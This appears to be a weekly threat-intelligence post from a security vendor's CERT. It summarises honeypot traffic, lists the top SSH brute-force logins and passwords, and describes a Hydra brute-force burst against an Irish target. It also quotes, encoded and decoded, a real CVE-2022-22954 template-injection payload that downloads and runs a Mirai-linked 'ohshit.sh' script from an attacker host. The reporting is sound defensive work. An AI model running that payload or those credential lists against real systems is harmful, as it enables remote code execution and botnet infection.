CERTCERT

Honeypots: activity of the week 50

More than 116,000 different IP addresses interacted with TEHTRIS honeypots deployed in Europe this week. Unsurprisingly, the nationalities of the most active IP addresses are American (23%), Dutch (15%), Chinese (7%), Russian (7%) and Bulgarian (6%) – the same prevalent nationalities as observed previously.

TEHTRIS reveals the top 10 logins and passwords used by attackers and looks at two different types of attacks, one using an automated testing tool, the other attempting to exploit a recent vulnerability in WMware.

Top 10 logins and passwords used by attackers

This week, TEHTRIS shares the top 10 most common logins and passwords used by attackers in brute force attacks on the SSH login protocol:

Passwords
345gs5662d34
3245gs5662d34
123456
admin
1234
password
123
12345
12345678
root
Logins
345gs5662d34
root
admin
ubuntu
test
user
postgres
oracle
ftpuser
git

This week, for example, the password 345gs5662d34 (and its variant 3245gs5662d34) accounted for more than 30% of the total attempts observed, exceeding the classic ‘admin’, ‘root’ or ‘password’. More than 7,400 different IP addresses tested these two passwords. As a reminder, it was first observed last week on TEHTRIS honeypots.

Burst of attack targeting Irish infrastructure

This week, a UK IP address was responsible for more than 80% of the total web activity on the TEHTRIS honeypots. This activity was concentrated on 13/12/22 between 15:20 and 16:00. It originated from 139.162.236[.]147 (AS63949 LINODE LLC), targeting exclusively an Irish infrastructure.

More than 99% of its requests consist of the URL /login.php accompanied by RawData such as:

tgroup=&next=&tgcookieset=&group_list=&prod_login=root&prod_pass=111187&Login=Login’ or ‘prod_login=admin&prod_pass=0000&Login=Login’ (the login and pass fields are changed on each instance). In addition, the requests are associated with User Agent Mozilla/5.0 (Hydra).

Hydra is a tool developed as a Proof of Concept to demonstrate how easy it is to gain unauthorized access to a remote system. It allows automatic testing of predefined login/password lists. According to its creator, it should only be used for vulnerability research in the context of auditing or legal pentesting operations.

This example illustrates that there is a fine line between legitimate and abusive use of a pentest tool and that these tools can be taken over by malicious actors.

Attempted exploitation of a VMware vulnerability

The US IP 195.178.120[.]13 (AS211252 – DELIS LLC) – which had never been observed on our honeypot network before 16/12/22 – scanned all TEHTRIS European honeypots for the remote code execution vulnerability affecting VMware Workspace ONE Access and VMware Identity Manager, corresponding to the CVE-2022-22954 (CVSS3 9.8).  

URL:

/catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F195.178.120.130%2Fohshit.sh%3B%20chmod%20777%20ohshit.sh%3B%20sh%20ohshit.sh%22%29%7D

URL decode:

/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http[:]//195.178.120[. ]130/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh")}

Here, the attacker seeks to fetch and execute the ohshit.sh file retrieved from the URL http[:]//195.178.120[.]130/ohshit.sh, which has been known to the VirusTotal platform since 16/12/22, the same date it was first observed on TEHTRIS honeypots. IP 195.178.120[.]130 – also registered with AS211252 (DELIS LLC) – directly targeted the honeypots by attempting to exploit the vulnerability in the Apache server CVE-2021-41773 (CVSS3: 7.5).

There is currently a big campaign targeting IoTs with a script called “ohshit.sh“, such as sha256 3cbe17bc00e637be7885542ce4bfd54296c11783376dca54fa157ef2811b88f9.

Contents of Sha256 3cbe17bc00e637be7885542ce4bfd54296c11783376dca54fa157ef2811b88f9

This script is flagged as malicious in public databases and is associated with the Mirai family of malware, as are some of the items we have reviewed in other reports. Here, the attacker seeks to access a directory to hide in (/tmp, /var/run etc.), then download a binary for each architecture (ARM, mips, x86…) from IP 193.35.18[. ]225 (US – AS202685 – Aggros Operations Ltd) to execute a script called “WTF“.